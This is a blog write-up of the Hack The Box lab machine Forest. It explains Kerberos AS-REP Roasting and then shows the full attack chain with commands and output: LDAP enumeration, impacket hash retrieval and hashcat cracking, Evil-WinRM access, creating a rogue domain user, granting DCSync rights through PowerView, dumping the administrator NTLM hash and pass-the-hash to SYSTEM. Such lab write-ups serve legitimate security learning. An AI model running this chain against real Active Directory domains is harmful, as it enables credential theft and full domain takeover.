AS-REP Roasting and Forest.HTB

I wanted to get my hands back on HTB after reading the research paper on AD CS attack posted in my previous blogs. So today I decided to pick another Windows machine from the list. For the past few weeks, I’ve been trying to learn more about Windows Security. This blog post is a write-up for forest.htb. We are going to explore some new skills such as AS-REPRoasting and DCSync Attack.

Let’s lay some groundwork before we start attacking the machine.

How does the Kerberos Authentication Protocol Works?

Kerberos Authentication is currently the most popular authorization mechanism used within industries. There have been many improvements since its initial release in Windows Server 2000. The core idea of KAP is that the client requests the Ticket Granting Ticket (TGT) from the Authentication Server using a valid set of credentials. Following that, the Authentication Server or Key Distribution Center (KDC) verifies the credentials and returns the TGT along with the Session Key. Now, the client will store this TGT and request it again before it expires.

The next step is that the client sends this TGT with the Service Principal Name (SPN) that the client wants to access (e.g., mstsc.exe – RDP). The Key Distribution Center verifies the Session Key along with the Service Principal Name (SPN) and performs checks to determine if the received session key is allowed to have RDP access or not. Finally, the KDC forwards the Session Key and service access to the client. With the received Session Key, the client will request the service from the server. The service will verify the Session Key and SPN and grant access to the client. The following diagram should help clarify things a bit.


Authentication Service (AS) Response Message (REP) Roasting

Since we now know that the Kerberos Authentication Protocol works with tickets to grant access to the client, it’s important to note that in some cases, there will be users who don’t have the Kerberos Pre-Authentication Attribute Enabled (DONT_REQ_PREAutH). This means that anyone can send a KRB_AS_REQ request to the DC on behalf of any of those users and receive the KRB_AS_REP from the KDC.

In a real-world scenario, not all applications will support Kerberos pre-authentication, making it common to find users in the DC for whom Kerberos Pre-Authentication is disabled. This allows attackers to request TGTs for these users and crack their session key offline using tools like John or hashcat. This is known as AS-REPRoasting.

Now that we have a full understanding of how AS-REP Roasting attacks work, let’s return to our machine Forest.htb. We’re going to perform an nmap scan on our target to determine the open ports and services.

# nmap -p- --min-rate=1000 -Pn -T4 -sC -sV
Starting Nmap 7.94 ( ) at 2023-09-28 23:19 EDT
Nmap scan report for
Host is up (0.018s latency).
Not shown: 65503 closed tcp ports (reset)
53/tcp    open     domain       Simple DNS Plus
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-29 03:27:46Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     0            Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8613/tcp  filtered canon-bjnp3
9389/tcp  open     mc-nmf       .NET Message Framing
20097/tcp filtered unknown
34289/tcp filtered unknown
37970/tcp filtered unknown
44990/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
48075/tcp filtered unknown
49664/tcp open     msrpc        Microsoft Windows RPC
49665/tcp open     msrpc        Microsoft Windows RPC
49666/tcp open     msrpc        Microsoft Windows RPC
49667/tcp open     msrpc        Microsoft Windows RPC
49671/tcp open     msrpc        Microsoft Windows RPC
49676/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open     msrpc        Microsoft Windows RPC
49684/tcp open     msrpc        Microsoft Windows RPC
49706/tcp open     msrpc        Microsoft Windows RPC
58043/tcp filtered unknown
62696/tcp filtered unknown
65360/tcp filtered unknown
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-09-28T20:28:36-07:00
|_clock-skew: mean: 2h26m51s, deviation: 4h02m30s, median: 6m50s
| smb2-time: 
|   date: 2023-09-29T03:28:39
|_  start_date: 2023-09-29T03:25:46
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 137.19 seconds

This is a Windows machine, and if you examine the nmap results, you’ll notice that port 389 is open for LDAP, indicating the domain as htb.local. Additionally, it appears that our SMB ports are open as well. Let’s investigate them to see if we can discover anything of interest. Before delving into SMB, I attempted to access the IP in a web browser to check for the presence of a web portal, but I was unsuccessful. I tried accessing, but it didn’t return any content.

# smbclient -L \\\\\\      
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

It appears that there are no active workgroup or default shares enabled on this Windows machine. At this stage, I decided to investigate further into port 88, which is associated with Kerberos security. Using the following nmap command, I discovered that the user “administrator” with the Kerberos principal administrator@htb.local was present on our target.

# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="htb.local"
Starting Nmap 7.94 ( ) at 2023-09-28 23:39 EDT
Nmap scan report for
Host is up (0.019s latency).

88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|_    administrator@htb.local

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

We could consider performing AS-REP Roasting to obtain password hashes; however, this would necessitate brute-forcing the username:password combinations using Impacket, which I am currently avoiding. Instead, let’s proceed with our examination of port 389 LDAP. I employed the following nmap command to perform enumeration on port 389 LDAP.

ldapsearch -x -b "dc=htb,dc=local" -H ldap://
# extended LDIF
# LDAPv3
# base <dc=htb,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL

# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20230929032536.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
<<Output was trimmed because it was too long but most things from the output is posted above>>

The -x switch of the command indicates anonymous authentication, while the -b flag indicates the base DN. It was possible to query the domain without credentials, indicating that Null Bind is enabled on the domain. We can proceed to query the domain further using ldapsearch. By using the following command, you will be able to enumerate all the users present on the machine.

# ldapsearch -x -b "dc=htb,dc=local" -H ldap:// "objectclass=user" | grep 'userPrincipalName:' |  sed 's/^.*: //'
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB85

It appears that there are a bunch of users present on the system. The ‘objectclass=user’ in the command above requests user parameters. We have enumerated a couple of mailbox usernames, which strongly suggests that the Exchange Server might be installed on the server. To gain more insight, I executed another LDAP search to enumerate Common Names (CN) within the domain controller to determine if there are any service accounts present on the target machine.

# ldapsearch -x -b "dc=htb,dc=local" -H ldap:// | grep 'OU=Service*' |  sed 's/^.*: //' 
OU=Service Accounts,DC=htb,DC=local
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

So we have identified one service account named svc-alfresco. Upon searching for ‘svc-alfresco’ on Google, I came across the following information:

“Process Services is an enterprise Business Process Management (BPM) solution targeted at business people and developers. At its core is a high-performance open-source business process engine based on Activiti with the flexibility and scalability to handle a wide variety of critical processes. Process Services provides a powerful suite of end-user tools and integrates with a range of enterprise systems, including Alfresco Content Services, Box, and Google Drive.”

Upon examining the configuration documents for Alfresco, we discovered that Authentication Services for Alfresco can be configured using Kerberos as well. Initially, I delved into Alfresco and LDAP authentication, but it didn’t yield positive results. Therefore, I opted to explore another option for Alfresco authentication using Kerberos. While reviewing the Alfresco documentation, I came across the following steps in the configuration of the Kerberos and AD setup.

“Look at step 8 in the image above, which says, ‘Select the Account tab and enable the ‘Do not require Kerberos pre-authentication’ option in the Account Options section.’

It appears that the service account created on the target machine does have pre-authentication enabled. This is a prime example of attempting an AS-REP Roasting attack. It means that we can request the encrypted TGT for this user. Since the TGT contains material encrypted with the user’s NTLM hash, we can subject it to an offline brute force attack and attempt to retrieve the password for the svc-alfresco user account.”

# impacket-GetNPUsers htb.local/svc-alfresco -dc-ip -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-alfresco

There you go! We got our initial TGT for the service account. Let’s crack this hash using our hashcat command.

hashcat.exe -m 18200 -a 0 service_ac_tgt rockyou.txt
hashcat (v6.2.6) starting

Host memory required for this attack: 335 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921343
* Keyspace..: 14344385


We successfully cracked the NTLM hash obtained via the impacket-GetNPUsers. The password for the service account is s3rvice. During the initial nmap scan, we observed that the port 5985/tcp is open for Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP). we will try to see if this service account is allowed to login remotely over WinRM using Evil-WinRM.

# evil-winrm -i -u svc-alfresco -p s3rvice         
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                           
Data: For more information, check Evil-WinRM GitHub:                                                             
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/30/2023   8:43 AM             34 user.txt

“We gained SSH access using the service accounts on our target machine. Here, we demonstrate how you can identify open ports and enumerate users using LDAP on a target Windows machine. Following that, identify the user for whom Kerberos pre-authentication is disabled and obtain the TGT for that user. If you’re lucky enough, you’ll be able to crack the password offline using hashcat or John. So now we have our initial access to the target. Let’s proceed from this point. I won’t post anything that results in an unsuccessful attempt to obtain the user or root flag. However, I did try exploring folders, shares, running processes, and enumerating the target through the service account. I encourage you to do the same to become more familiar with the target. While exploring the Desktop directory, I obtained the user flag.

Next, we’re going to use the ‘net group /domain’ command from this account to list the domain groups. We’ve got a bunch of groups there.”

net group /domain

Group Accounts for \\

*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

I’m selecting ‘Domain Admins’ to create a new user from the current svc-alfresco user account session. The following four commands will create a new user for you. However, when I attempted to add it to ‘Domain Admins,’ I received a permission denied error. So, I tried a couple of other groups, and I was able to add the new user, ‘forest1,’ to the ‘Exchange Windows Permissions’ group. Let’s confirm that our user has been added to the ‘Exchange Windows Permissions’ group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user forest1 asdf123 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Domain Admins" forest1 /add
net.exe : System error 5 has occurred.
    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Access is denied.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions" forest1 /add
The command completed successfully.

“To grant DCSync privileges to our new user, ‘forest1,’ we’ll need to use PowerView.ps1. I encountered some difficulty when trying to install the PowerSploit Module on the target machine. Here’s a piece of advice worth two cents: locate the PowerShell Module path using the command “$ENV:PSModulePath,” download the file, and upload it to the target machine. Afterward, set the -ExecutionPolicy to ‘Bypass.’ Here are my steps:”

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Env:PSModulePath
C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules

Upload and Extract the PowerSploit zip file to the target machine using the following command

//uploading it on the Module path
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules>upload
//extracting it in module path
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules>powershell.exe -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('','.'); }"

Now Import the powersploit module.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules>powershell.exe -ExecutionPolicy Bypass
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules>Import-Module ./PowerSploit.psd1

In case the Add-DomainObjectAcl command that I will use shortly doesn’t work in the next step then switch to ‘Recon’ directory and import the PowerView.ps1 from there manually.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules\Recon>powershell.exe -ExecutionPolicy Bypass
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\WindowsPowerShell\Modules\Recon>Import-Module ./PowerView.ps1

Now finally we’re going to use the following command to assign the DCSync right to our Forest1 user account using the following command.

$password = ConvertTo-SecureString 'asdf123' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTB\forest1', $password)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity forest1 -Rights DCSync

On attacking machine, run the following command to get the NTLM hash for the administrator user account.

# impacket-secretsdump htb.local/forest1@ -just-dc-user Administrator -just-dc-ntlm
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up... 

Let’s grabthe root flag using impacket-psexec command

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@ cmd.exe 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file FNxQjaBE.exe
[*] Opening SVCManager on
[*] Creating service frsP on
[*] Starting service frsP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 61F2-A88F

 Directory of C:\Users\Administrator\Desktop

09/23/2019  02:15 PM    <DIR>          .
09/23/2019  02:15 PM    <DIR>          ..
10/03/2023  08:27 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  10,435,207,168 bytes free

C:\Users\Administrator\Desktop> type root.txt


That’s all. I enjoy learning the AS-REP Roasting attack and of course DCSync Rights to the newly created user account on the target machine.